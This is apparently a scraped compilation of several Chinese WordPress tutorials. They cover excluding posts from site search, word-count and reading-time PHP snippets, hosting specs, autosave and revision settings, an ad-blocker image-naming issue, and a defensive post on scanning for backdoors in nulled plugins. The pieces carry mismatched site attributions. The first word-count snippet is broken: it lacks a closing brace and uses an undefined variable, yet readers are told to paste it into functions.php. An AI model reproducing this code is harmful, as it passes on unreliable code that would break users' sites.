• WP Rocket和Swift Performance內(nèi)置了它們的設(shè)置，因此如果你使用其中一個作為緩存插件，則不需要這樣做。

到此，我們已經(jīng)完成了Autoptimize設(shè)置中對StackPath CDN的配置。

點此進入 StackPath CDN 官網(wǎng)

希望我們網(wǎng)站（ http://news.qtyiliao.cn/ ） 分享的《國外CDN服務(wù)商外貿(mào)免備案推薦：Stackpath CDN設(shè)置教程》，對您有幫助。

1 WordPress站內(nèi)搜索排除指定文章或頁面

• 2 WordPress站內(nèi)搜索排除某些類別的文章
• 3 WordPress站內(nèi)搜索排除所有頁面
• 4 Search Exclude插件不讓某篇文章頁面顯示在站內(nèi)搜索結(jié)果
• 5 WordPress站內(nèi)搜索不顯示指定的文章

有些時候，我們可能不想讓某分類、文章或頁面，出現(xiàn)在WordPress站內(nèi)搜索結(jié)果中。

因此我們可以使用filter（過濾器），來過濾掉某些文章或網(wǎng)頁。

• 這就是使用WordPress建站的優(yōu)勢。

WordPress站內(nèi)搜索排除指定文章或頁面

// WordPress搜索結(jié)果排除指定文章或頁面ID
function wpsite_search_filter_id($query) {
if ( !$query->is_admin && $query->is_search) {
$query->set('post__not_in', array(40,819));
//文章或者頁面的ID
}
return $query;
}
add_filter('pre_get_posts','wpsite_search_filter_id');

• 請注意：需要修改第4行的文章或頁面的ID。

WordPress站內(nèi)搜索排除某些類別的文章

// WordPress搜索結(jié)果排除某分類的文章
function wpsite_search_filter_category( $query) {
if ( !$query->is_admin && $query->is_search) {
$query->set('cat','-15,-57');
//分類的ID，前面的減號表示排除；如果直接寫ID，則表示只在該分類ID中搜索
}
return $query;
}
add_filter('pre_get_posts','wpsite_search_filter_category');

• 請注意：修改ID、查看代碼注釋說明。

WordPress站內(nèi)搜索排除所有頁面

這非常實用，建議添加 ▼

// WordPress搜索結(jié)果排除所有頁面
function search_filter_page($query) {
if ($query->is_search) {
$query->set('post_type', 'post');
}
return $query;
}
add_filter('pre_get_posts','search_filter_page');

Search Exclude插件不讓某篇文章頁面顯示在站內(nèi)搜索結(jié)果

• 我們用WordPress建站，本來是不具備站內(nèi)搜索排除某篇文章頁面的功能。
• 但是，可通過添加WordPress代碼，或安裝WordPress插件來實現(xiàn)此功能。
• Search Exclude插件允許你隨時將特定文章排除在站內(nèi)搜索結(jié)果中。

安裝Search Exclude插件后，你將在文章編輯界面的右側(cè)看到新功能?▼

以下是安裝WordPress插件的方法?▼

如何安裝WordPress插件？3種安裝WordPress插件方法

WordPress的強大之處，可以通過安裝WordPress插件的方式，來擴展各種豐富功能，比如：SEO、電子商務(wù)功能等等。安裝WordPress插件的方法，類似于安裝WordPress主題。安裝WordPress插件新……

WordPress站內(nèi)搜索不顯示指定的文章

只要選中這個“Exclude from Search Results”選項，該文章就不會再出現(xiàn)在網(wǎng)站的站內(nèi)搜索結(jié)果中。

當(dāng)你在WordPress前臺站內(nèi)搜索時，你會發(fā)現(xiàn)你找不到被排除的文章 ▼

在Search Exclude插件的管理界面中，你可以查看所有已排除在站內(nèi)搜索的文章或頁面 ▼

• 并且，可以批量移除它們。

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress如何排除指定分類/文章頁面在站內(nèi)搜索結(jié)果？》，對您有幫助。

1 一、添加WordPress文章字?jǐn)?shù)統(tǒng)計代碼

• 2 二、為WordPress預(yù)計閱讀時間
• 3 三、優(yōu)化預(yù)期閱讀時間
• 4 四、預(yù)計閱讀時間碼優(yōu)化之前和之后比較
• 5 （ceil()?函數(shù)）是什么？

有些新媒體網(wǎng)站的文章開頭，有字?jǐn)?shù)統(tǒng)計和該文的預(yù)期閱讀時間。

• 我們認為這2個小數(shù)據(jù)是挺人性化的，對用戶是非常有好處的。
• 這樣讀者在閱讀之前，就可以預(yù)估該文的篇幅長度，以及自己大概閱讀時間。
• 今天我們將討論如何為WordPress添加文章計數(shù)統(tǒng)計和預(yù)計閱讀時間。

一、添加WordPress文章字?jǐn)?shù)統(tǒng)計代碼

將以下代碼添加到主題中的最后幾個functions.php文件中 ?> 之前?▼

//字?jǐn)?shù)統(tǒng)計
function count_words ($text) {
global $post;
if ( '' == $text ) {
$text = $post->post_content;
if (mb_strlen($output, 'UTF-8') < mb_strlen($text, 'UTF-8')) $output .= '本文《' . get_the_title() .'》共' . mb_strlen(preg_replace('/\s/','',html_entity_decode(strip_tags($post->post_content))),'UTF-8') . '個字';
return $output;
}

• 在測試之后，上面的代碼統(tǒng)計數(shù)據(jù)在中文和英文中沒有問題；
• 并且在Microsoft Word中計算的單詞數(shù)量完全相同。

二、為WordPress預(yù)計閱讀時間

將以下代碼添加到主題中的最后幾個functions.php文件中 ?>

保存之后，你可以在WordPress文章內(nèi)容的開頭自動顯示“預(yù)計閱讀時間x分鐘”▼

function lmsim_read_time($content){
$text = trim(strip_tags( get_the_content()));
$text_num = mb_strlen($text, 'UTF-8');
$read_time = ceil($text_num/400);
$content = '<div class="read-time">系統(tǒng)預(yù)計閱讀時間 <span>' . $read_time . '</span> 分鐘</div>' . $content;
return $content;
}
add_filter ( 'the_content', 'lmsim_read_time');

• 上述代碼中第4行的值400，基于百度的“普通人的平均閱讀速度（300~500）字/分鐘”。
• 如果你認為400太慢，你可以自己修改它。
• 你需要一個自定義的風(fēng)格。你可以對.read-time 在自定義css中的樣式。

在測試之后，發(fā)現(xiàn)上面代碼統(tǒng)計中的單詞數(shù)有一些錯誤，這些錯誤，超出了實際錯誤

• A網(wǎng)站統(tǒng)計信息中的單詞數(shù)為290個字符，Word中的統(tǒng)計信息相同。
• 與B網(wǎng)站的單詞數(shù)（$ text_num）比實際數(shù)字多12個。
• 這個預(yù)期的閱讀時間只能出現(xiàn)在文章的開頭，因此我們決定將這2個代碼組合起來進行優(yōu)化。

三、優(yōu)化預(yù)期閱讀時間

將以下代碼添加到主題中的最后幾個functions.php文件中 ?> 之前?▼

//字?jǐn)?shù)和預(yù)計閱讀時間統(tǒng)計
function count_words_read_time () {
global $post;
$text_num = mb_strlen(preg_replace('/\s/','',html_entity_decode(strip_tags($post->post_content))),'UTF-8');
$read_time = ceil($text_num/400);
$output .= '本文《' . get_the_title() .'》共' . $text_num . '個字，系統(tǒng)預(yù)計閱讀時間或需' . $read_time . '分鐘。';
return $output;
}

• 其中，400或更高是讀取速度并且可以修改。
• 如果你只需要輸出閱讀時間或文章字?jǐn)?shù)，你只需要修改和刪除第6行中的一些行。
• 請自己動手DIY。

然后，將調(diào)用統(tǒng)計代碼添加到single.php文件中的適當(dāng)位置。

<?php echo count_words_read_time(); ?>

四、預(yù)計閱讀時間碼優(yōu)化之前和之后比較

在我們測試之后，當(dāng)字?jǐn)?shù)小于或等于400時，即當(dāng)預(yù)計閱讀時間小于或等于1分鐘時。

但是，如果它超過400，它將是有偏差的。

• 例如，如果將上述290個字符粘貼3次以達到1160個字符，則第2個點的預(yù)計閱讀時間將為4分鐘，
• 針對第3個點優(yōu)化的代碼將為3分鐘。
• 所以從數(shù)字的角度來看，它是優(yōu)化代碼統(tǒng)計的預(yù)計閱讀時間更準(zhǔn)確。

（ceil()?函數(shù)）是什么？

ceil()?函數(shù)向上舍入到最接近的整數(shù)。

這意味著返回不小于x的下一個整數(shù)。

如果x具有小數(shù)部分，則ceil()?返回的類型仍然是float，因為float的范圍通常大于integer。

例子

• ceil(0.60)，輸出 1；
• ceil(0.4) ，輸出 1；
• ceil(5)，輸出 5；
• ceil(5.1)，輸出 6；
• ceil (-5.1)，輸出 -5；
• ceil(-5.9)，輸出 -5；

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress如何添加文章字?jǐn)?shù)統(tǒng)計和預(yù)計閱讀時間？》，對您有幫助。

1 如何挑選合適的網(wǎng)站空間？

• 1.1 ① 5000IP以下網(wǎng)站空間配置
• 1.2 ② 5000~10000IP之間網(wǎng)站空間配置
• 1.3 ③10000IP~20000IP之間網(wǎng)站空間配置
• 2 如何購買合適的網(wǎng)站空間/VPS服務(wù)器？

不論是個人或外貿(mào)企業(yè)建站，在剛開始搭建電商網(wǎng)站時，都會想要了解：

• 公司網(wǎng)站空間一般多大合適？
• 如何挑選合適容量的網(wǎng)站空間？
• 外貿(mào)企業(yè)網(wǎng)站空間多少G合適？
• 外貿(mào)公司網(wǎng)站空間的寬帶一般多少合適？
• 外貿(mào)企業(yè)網(wǎng)站空間流量多少合適？

如何挑選合適的網(wǎng)站空間？

以下網(wǎng)站空間/VPS服務(wù)器配置選擇建議，其中硬盤容量，僅供視頻內(nèi)容居多的網(wǎng)站參考。

• 請根據(jù)實際情況，咨詢網(wǎng)站空間/VPS服務(wù)器供應(yīng)商。

① 5000IP以下網(wǎng)站空間配置

• 4核 CPU
• 4G 內(nèi)存
• 100G 硬盤
• 100M 網(wǎng)絡(luò)無限流量（硬盤不限，自建片源除外）

② 5000~10000IP之間網(wǎng)站空間配置

• 8核 CPU
• 8G內(nèi)存
• 200G 硬盤
• 100M網(wǎng)絡(luò)無限流量（硬盤不限，自建片源，也應(yīng)與Web服務(wù)器分開）

③10000IP~20000IP之間網(wǎng)站空間配置

• 8核 CPU
• 16G 內(nèi)存
• 300G 硬盤
• 100M網(wǎng)絡(luò)無限流量（對硬盤沒有限制，隨著流量的提升，數(shù)據(jù)庫和WEB可以分開處理）

購買網(wǎng)站空間/VPS服務(wù)器時，必須在自己能承受的價格范圍內(nèi)。

如何購買合適的網(wǎng)站空間/VPS服務(wù)器？

WordPress是全世界最流行的建站程序，所以一般是以WordPress建站為主流。

若是外貿(mào)企業(yè)公司的網(wǎng)站空間，首選推薦BlueHost。

因為BlueHost是WordPress官方推薦的網(wǎng)站空間商 ▼

BlueHost主機怎么樣？最新BlueHost美國優(yōu)惠碼/優(yōu)惠券

BlueHost中文教程：教你如何以優(yōu)惠價格購買BlueHost美國主機？[su_button url=”https://www.wordpressx.com/go/bluehost” target=”blank” style=”3d” size=”5″ icon=”icon: external-li……

要是想要以最便宜的價格域名域名，首選推薦NameSilo ▼

NameSilo域名注冊教程（送你 1 美金 NameSilo優(yōu)惠碼）

NameSilo 優(yōu)惠碼：WXR?（優(yōu)惠10%）NameSilo 2022最新注冊流程在眾多網(wǎng)絡(luò)營銷方法中，最有效果的是SEO。既然做搜索引擎優(yōu)化，就必須注冊域名和建站。不過，在注冊域名時，一些不明智……

希望我們網(wǎng)站（ http://news.qtyiliao.cn/ ） 分享的《個人如何選擇網(wǎng)站空間？外貿(mào)企業(yè)公司網(wǎng)站空間多大合適》，對您有幫助。

1 ?后門是什么意思？

• 2 ??警告有木馬后門的插件主題
• 3 ?如何掃描木馬后門程序漏洞？
  • 3.1 ?第一種：使用WordPress安全掃描插件
  • 3.2 ?第二種：使用安全掃描查找PHP漏洞文件在線工具

WordPress是全球最多人使用的免費開源建站程序，有很多網(wǎng)絡(luò)營銷人員都用WordPress建站做SEO流量賣廣告、賣會員、賣產(chǎn)品、賣服務(wù)……

• 因此WordPress有非常豐富的WordPress插件和主題可以免費下載，同時也有更高級、付費專業(yè)版的插件和主題可供選擇。

最近我們打算購買某款WordPress插件專業(yè)版，就去谷歌搜索了解，無意發(fā)現(xiàn)到有網(wǎng)站專門提供WordPress插件和主題的破解版的免費下載。

索性嘗試下載來使用，但是感覺不太對勁：為什么這些提供免費下載破解版的網(wǎng)站，完全沒有盈利模式，網(wǎng)站上也沒有其它廣告？

由于網(wǎng)站有被黑過幾次，所以使用破解版軟件、插件或主題，都是非常小心翼翼地以防萬一有“后門”漏洞程序。

以下就是2020年08月31日我們網(wǎng)站網(wǎng)站被黑的截圖 ▼

• Linux服務(wù)器被來自印尼的黑客入侵和篡改。
• 在網(wǎng)站的每個文件夾里都多了個“mm.php”漏洞文件，有可能是使用了不完善的VestaCP?面板造成的。

解決被黑問題，就是直接重裝CentOS 7操作系統(tǒng)和改為安裝CWP控制面板，然后恢復(fù)網(wǎng)站備份 ▼

CWP控制面板如何設(shè)置定時自動備份和恢復(fù)備份？

上次我的網(wǎng)站被黑已經(jīng)是幾年前的事情（具體哪一年已經(jīng)忘了）。最近（2020年8月31日）網(wǎng)站服務(wù)器被來自印尼的黑客入侵和篡改，有可能是使用了不完善的VestaCP 面板。 解決被黑問題，就……

• 因為之前了解過“寶塔控制面板”被爆安全漏洞，所以最終決定使用CWP控制面板。

?后門是什么意思？

主要來自“特洛伊木馬”，后門的意思就是指軟件添加了漏洞，就好像開了你家的后門，方便入侵盜取信息。

??警告有木馬后門的插件主題

以下2個網(wǎng)站提供各大WordPress插件破解版、WordPress主題破解版：

1）WPTRY ▼

點此進入 WPTRY 網(wǎng)站

2）PremiumFreeThemes?▼

點此進入 PremiumFreeThemes 網(wǎng)站

• 我們非常肯定這2個網(wǎng)站上的軟件、插件和主題有后門漏洞，千萬不要下載來用，否則后果請自負！

?如何掃描木馬后門程序漏洞？

有2種方式可以掃描網(wǎng)站源碼有沒有后門文件：

• 第一種：使用WordPress安全掃描插件
• 第二種：使用在線工具查殺掃描文件

?第一種：使用WordPress安全掃描插件

推薦用此WordPress網(wǎng)站安全掃描插件——Wordfence Security 進行批量掃描WordPress網(wǎng)站上所有主題和插件，檢測是否有PHP后門漏洞文件 ▼

點此進入WordPress插件官網(wǎng)免費下載 Wordfence Security 插件

?第二種：使用安全掃描查找PHP漏洞文件在線工具

幫助你分析可疑文件和URL，檢測惡意軟件的類型的在線工具?▼

點此進入 安全掃描查找PHP漏洞文件在線工具

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《如何掃描網(wǎng)站源碼有沒有后門文件?在線查找PHP木馬漏洞》，對您有幫助。

1 WordPress自動保存功能有什么用？

• 2 WordPress自動保存和自動草稿有何不同？
• 3 WordPress修訂版本功能有何用處？
• 4 修改WordPress配置文件（方法1 推薦）
  • 4.1 設(shè)置WordPress修訂版本最多允許幾個？
• 5 禁用WordPress修訂版本（方法2）

WordPress的自動保存、自動草稿和修訂版本功能，一直受到網(wǎng)絡(luò)營銷人員的批評。

不過，WordPress是世界上最受歡迎的網(wǎng)站程序：

• WordPress功能非常強大；
• 再加上無限的可擴展性；
• 所以WordPress在個人和企業(yè)客戶中，非常受歡迎。

WordPress自動保存功能有什么用？

WordPress自動保存可防止編輯器意外關(guān)閉并導(dǎo)致文章內(nèi)容丟失。

• 例如，網(wǎng)絡(luò)突然斷開連接，突然斷電等等……
• 編輯文章很困難，并且文章已經(jīng)消失……
• 此刻，是非常意外的！

但是，此功能可能會導(dǎo)致數(shù)據(jù)庫膨脹，并無緣無故地添加大量無用的垃圾。

幸運的是，有一個WordPress插件 “Easy WP Cleaner” 可以刪除這些垃圾。

問題就在于這種“減肥過程”非常痛苦，本文會分享解決此問題的最好方法。

WordPress自動保存和自動草稿有何不同？

WordPress的另一個非常煩人的功能是自動草稿。

• 自動草稿與自動保存類似，自動保存就是你撰寫文章的時候。
• 文章會根據(jù)時間間隔，自動備份并寫入數(shù)據(jù)庫。
• 單擊“寫文章”時自動草稿是新的。

即使你退出編輯器，數(shù)據(jù)也會寫入數(shù)據(jù)庫，無論你是否鍵入數(shù)據(jù)。

WordPress修訂版本功能有何用處？

實際上WordPress的修訂版本功能非常有用，用戶可以檢查更改并執(zhí)行版本控制。

事情總是有兩面性，就像自動保存功能一樣，忽略這些變化會給數(shù)據(jù)庫帶來不必要的負擔(dān)。

• 如果編輯長文章時，寫了大段內(nèi)容，記得手動點擊保存。
• 或是電腦用記事本軟件，先編輯好后復(fù)制到WordPress編輯里再發(fā)布（能有效避免在文章輸入數(shù)據(jù)庫的過程中，出現(xiàn)數(shù)據(jù)丟失的情況）。

修改WordPress配置文件（方法1 推薦）

其實WordPress中有很多隱藏的功能，可以通過在WordPress安裝根目錄的wp-config.php文件的功能，根據(jù)需求進行配置禁用或啟用。

不少使用WordPress建站的朋友，都想禁用WordPress自動草稿，而不是自動保存。

以下代碼解決了這個問題。

由于WordPress的機制，無法完全禁用自動保存，但你可以通過設(shè)置較長的時間間隔，來實現(xiàn)類似的效果，例如 ▼

define( 'AUTOSAVE_INTERVAL', 3600 ); // 默認是 60，3600秒表示自動保存間隔1小時

設(shè)置WordPress修訂版本最多允許幾個？

// WordPress設(shè)置自動保存間隔/秒
define('AUTOSAVE_INTERVAL', 3600);
// WordPress設(shè)置修訂版本最多允許幾個
define('WP_POST_REVISIONS', 3);

你可以將以下定義，添加到你的 WordPress 站點的 wp-config.php 文件中 ▼

define( 'AUTOSAVE_INTERVAL', 3600 ); // 3600秒表示自動保存間隔1小時
define( 'EMPTY_TRASH_DAYS', 7 ); // 在 7 天后被刪除
define( 'DISABLE_WP_CRON', true ); // 禁用內(nèi)部Wp-Cron函數(shù)
define('WP_POST_REVISIONS', false ); // 禁用文章修訂版本

• 自動草稿在 7 天未使用后會自動刪除。
• 它們基本上是自動功能清理的，無需擔(dān)心它們。
• 測試過設(shè)置為 define( 'AUTOSAVE_INTERVAL', 86400 ); 自動保存間隔24小時無法生效。
• 建議設(shè)置自動保存間隔為3600（1小時）。

禁用WordPress修訂版本（方法2）

如果方法1的禁用文章修訂版本無效，需要使用以下WordPress禁用所有文章類型的修訂版本的代碼。

請在WordPress主題模板文件functions.php中，添加以下禁用文章修訂版本代碼 ▼

// WordPress禁用所有文章類型的修訂版本
add_filter( 'wp_revisions_to_keep', 'cwl_wp_revisions_to_keep', 10, 2 );
function cwl_wp_revisions_to_keep( $num, $post ) { return 0;}

WordPress禁用某種文章類型的修訂版本的代碼 ▼

// WordPress禁用某種文章類型的修訂版本
add_filter( 'wp_revisions_to_keep', 'cwl_wp_revisions_to_keep', 10, 2 );
function cwl_wp_revisions_to_keep( $num, $post ) {
if ( 'post_type' == $post->post_type ) { //引號中post_type改為你想禁用修訂版本的文章類型
return 0;
}
return $num;
}

至于WordPress自動草稿，你無法禁用它們，有個重要的原因。

Audrey Capital（Matt Mullenweg 的天使投資公司）的技術(shù)忍者 Samuel ‘Otto’ Wood說：

之所以存在自動草稿，是因為多個用戶可以同時創(chuàng)建新帖子。如果兩個人幾乎在同一時間進入 post-new，然后他們的第一次自動保存幾乎同時發(fā)生，那么就會出現(xiàn)競爭條件，可能導(dǎo)致其中一個人取回錯誤的帖子 ID，這將導(dǎo)致帖子被覆蓋/丟失，當(dāng)他們繼續(xù)編輯帖子時。

自動草稿會在顯示編輯屏幕之前創(chuàng)建帖子并獲取新帖子的 ID，從而防止兩個同時作者在瀏覽器的數(shù)據(jù)中意外地擁有相同的帖子 ID。

負責(zé) WordPress 的 TinyMCE 集成的 Andrew Ozz說：

這也使得在保存第一個草稿之前上傳圖像成為可能，并且它們將準(zhǔn)確地附加到新帖子中。

對于使用帶有古騰堡編輯器的 WordPress 5.0+ 版本的人，下面的代碼片段可以禁用自動草稿/保存 ▼

/**
 * 禁用古騰堡編輯器自動保存 (間隔 3600秒)
 */
add_filter( 'block_editor_settings', 'cwl_block_editor_settings', 10, 2 );
function cwl_block_editor_settings( $editor_settings, $post ) {
    $editor_settings['autosaveInterval'] = 3600;
    return $editor_settings;
}

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress文章如何禁止自動保存草稿/禁用修訂版本？》，對您有幫助。

1 為什么網(wǎng)站無法顯示帶有g(shù)oogle-adsense命名的圖片？

• 2 如何解決網(wǎng)站無法顯示帶有g(shù)oogle-adsense命名的圖片？

WordPress為何無法顯示帶有g(shù)oogle-adsense命名的圖片?

在我們網(wǎng)站發(fā)布文章，想要揭露網(wǎng)上合法貸款騙局，首張圖片命名中包含“google-ads”，一直無法顯示該圖片。

起初以為是空間商禁止了此類圖片名稱，就想到在本地電腦上做個測試。

在本地電腦測試后，發(fā)現(xiàn)WordPress文章編輯器仍然無法顯示帶有g(shù)oogle-ads命名的圖片：

google-ads.jpg
google-adsense.jpg

google-ads.png
google-adsense.png

在前臺也無法顯示此類圖片。

為什么網(wǎng)站無法顯示帶有g(shù)oogle-adsense命名的圖片？

多想想為什么，也許就會想到答案。

突然想到，是因為不希望錯誤點擊自己的AdSense廣告，索性啟用了廣告屏蔽插件，不料竟然連帶有g(shù)oogle-ads命名的圖片也自動屏蔽了。

所以為了避免已啟用廣告屏蔽插件的訪客，無法查看顯示帶有g(shù)oogle-ads命名的圖片，建議不要以“google-ads”作為圖片名稱。

如何解決網(wǎng)站無法顯示帶有g(shù)oogle-adsense命名的圖片？

不以“google-ads”作為圖片名稱，重命名為其它名稱即可。

例如：將圖片重命名為“ggads”或“gg-adsense”。

在此做個記錄，以免忘記犯錯又浪費時間了。

順便提醒所有使用WordPress建站的朋友，需要注意避免帶有“google-ads”或“google-adsense”之類命名的圖片。

擴展閱讀：

WordPress外鏈特色圖片插件：Featured Image from URL

WordPress如何添加外鏈特色圖片？Featured Image from URL插件設(shè)定雖然用WordPress建站有很多優(yōu)勢，但是在WordPress默認的媒體庫，并不是那么好用：上傳圖片會自動裁剪生成各種尺寸……

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress為何無法顯示帶有g(shù)oogle-adsense命名的圖片?》，對您有幫助。